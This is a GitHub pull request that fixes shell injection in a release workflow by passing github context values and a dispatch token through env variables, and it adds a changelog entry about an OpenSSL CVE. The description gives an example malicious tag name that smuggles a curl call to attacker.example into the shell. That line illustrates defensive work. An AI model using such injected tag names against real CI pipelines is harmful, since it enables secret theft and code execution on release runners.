### PR TITLE
fix(sec): eliminate shell injection via github context in release-core.yml

### DIFF
--- a/.github/workflows/release-core.yml
+++ b/.github/workflows/release-core.yml
@@ -41,8 +41,10 @@ jobs:
 
     - name: Extract and validate version
       id: version
+      env:
+        GH_REF_NAME: ${{ github.ref_name }}
       run: |
-        TAG="${{ github.ref_name }}"               # e.g. core-v0.1.0
+        TAG="${GH_REF_NAME}"                       # e.g. core-v0.1.0
         TAG_VERSION="${TAG#core-v}"                # strip prefix → 0.1.0
 
         TOML_VERSION=$(grep '^version = ' pyproject.toml | head -1 | cut -d'"' -f2)
@@ -128,19 +130,26 @@ jobs:
 
     steps:
     - name: Dispatch core-released event to private repo
+      env:
+        DISPATCH_TOKEN: ${{ secrets.DOWNSTREAM_DISPATCH_TOKEN }}
+        CORE_VERSION: ${{ needs.validate.outputs.version }}
+        GH_REF_NAME: ${{ github.ref_name }}
+        GH_SHA: ${{ github.sha }}
+        GH_REPOSITORY: ${{ github.repository }}
+        GH_RUN_ID: ${{ github.run_id }}
       run: |
         curl -fsSL \
           -X POST \
           -H "Accept: application/vnd.github+json" \
-          -H "Authorization: Bearer ${{ secrets.DOWNSTREAM_DISPATCH_TOKEN }}" \
+          -H "Authorization: Bearer ${DISPATCH_TOKEN}" \
           -H "X-GitHub-Api-Version: 2022-11-28" \
           https://api.github.com/repos/longieirl/bankstatements/dispatches \
           -d "{
             \"event_type\": \"core-released\",
             \"client_payload\": {
-              \"core_version\": \"${{ needs.validate.outputs.version }}\",
-              \"ref\": \"${{ github.ref_name }}\",
-              \"sha\": \"${{ github.sha }}\",
-              \"run_url\": \"https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }}\"
+              \"core_version\": \"${CORE_VERSION}\",
+              \"ref\": \"${GH_REF_NAME}\",
+              \"sha\": \"${GH_SHA}\",
+              \"run_url\": \"https://github.com/${GH_REPOSITORY}/actions/runs/${GH_RUN_ID}\"
             }
           }"

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -9,6 +9,16 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ---
 
+## [0.1.4] — 2026-05-01
+
+### Security
+- **CVE-2026-31789** (`#159`, PRs #163 #165 #166) — Added `apt-get upgrade` to the production Docker stage so every build pulls the latest patched Debian packages. Resolved 3 critical OpenSSL findings (`libssl3t64`, `openssl`, `openssl-provider-legacy`). Trivy scan on `:latest` confirms 0 critical vulnerabilities.
+
+### Fixed
+- **Release workflow** (PR #166) — `release.yml` was reading pre-monorepo paths (`src/__version__.py`, `pyproject.toml`). Updated to `packages/parser-core/src/bankstatements_core/__version__.py` and `packages/parser-core/pyproject.toml`. Also tightened version grep to `^version =` to avoid false match on ruff `target-version`.
+
+---
+
 ## [0.1.3] — 2026-04-10
 
 ### Added


### PR DESCRIPTION
## Summary
Fixes #168. Two `run:` steps in `release-core.yml` interpolated `${{ github.ref_name }}` and other context expressions directly into shell scripts. A tag name containing shell metacharacters (e.g. `` core-v0.1.0`curl attacker.example` ``) would execute on the release runner, enabling exfiltration of the `DOWNSTREAM_DISPATCH_TOKEN` secret and arbitrary code execution.

## Changes
- Move `github.ref_name`, `github.sha`, `github.repository`, `github.run_id`, `secrets.DOWNSTREAM_DISPATCH_TOKEN`, and `needs.validate.outputs.version` into `env:` blocks on both affected steps
- Reference them as shell variables (`${GH_REF_NAME}` etc.) in the `run:` scripts — shell variables are not subject to expression injection

## Type
- [x] Security
- [x] Bug fix

## Testing
- [x] Manually reviewed — workflow logic is unchanged, only the injection vector is removed
- [x] No new warnings
- [ ] Tests pass (coverage ≥ 91%) — workflow-only change, no Python touched

## Checklist
- [x] Code follows project style
- [x] Self-reviewed
- [x] Documentation updated (if needed) — N/A
- [x] No new warnings

## Downstream impact
- [ ] This PR changes a public interface in `bankstatements_core`